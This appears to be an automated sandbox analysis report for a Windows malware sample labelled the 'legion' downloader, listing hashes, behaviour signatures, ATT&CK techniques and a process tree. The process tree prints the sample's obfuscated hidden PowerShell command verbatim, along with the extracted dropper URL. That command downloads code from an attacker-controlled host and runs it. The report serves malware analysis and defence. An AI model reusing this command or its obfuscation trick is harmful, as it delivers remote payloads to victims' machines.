legion | 262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041

Analysis

max time kernel
63s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
16-06-2022 09:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe
Size

184KB
MD5

2822431899265acfe0116a193ff7eb86
SHA1

19b65753f8b60664b371b28680b5d4ce7660af2a
SHA256

262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041
SHA512

11bf4b1bc5217564c03811608ad7adce819925dd47daa6f01eca31a9f0aa46f519b93635efc44f7e7422f44650cb2fa6d4f024dbf52dfb77e26ccb6793267797

Score

10^/10

legion downloader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://legion17.com/legion17/welcome

Signatures

Legion
Legion is a malware downloader written in C++.
downloader legion

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4472	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4472	powershell.exe
4472	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4472	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3212 wrote to memory of 2800	3212	262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe	81
PID 3212 wrote to memory of 2800	3212	262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe	81
PID 3212 wrote to memory of 2800	3212	262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe	81
PID 2800 wrote to memory of 4472	2800	cmd.exe	83
PID 2800 wrote to memory of 4472	2800	cmd.exe	83
PID 2800 wrote to memory of 4472	2800	cmd.exe	83

C:\Users\Admin\AppData\Local\Temp\262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe
"C:\Users\Admin\AppData\Local\Temp\262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.com/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "&{$t='#i#ex##################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.com/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4472-132-0x0000000002F90000-0x0000000002FC6000-memory.dmp

Filesize
216KB

Download
memory/4472-133-0x0000000005A30000-0x0000000006058000-memory.dmp

Filesize
6.2MB

Download
memory/4472-134-0x0000000005900000-0x0000000005922000-memory.dmp

Filesize
136KB

Download
memory/4472-135-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/4472-136-0x00000000062B0000-0x0000000006316000-memory.dmp

Filesize
408KB

Download
memory/4472-137-0x0000000006810000-0x000000000682E000-memory.dmp

Filesize
120KB

Download
memory/4472-138-0x0000000008130000-0x00000000087AA000-memory.dmp

Filesize
6.5MB

Download
memory/4472-139-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

Filesize
104KB

Download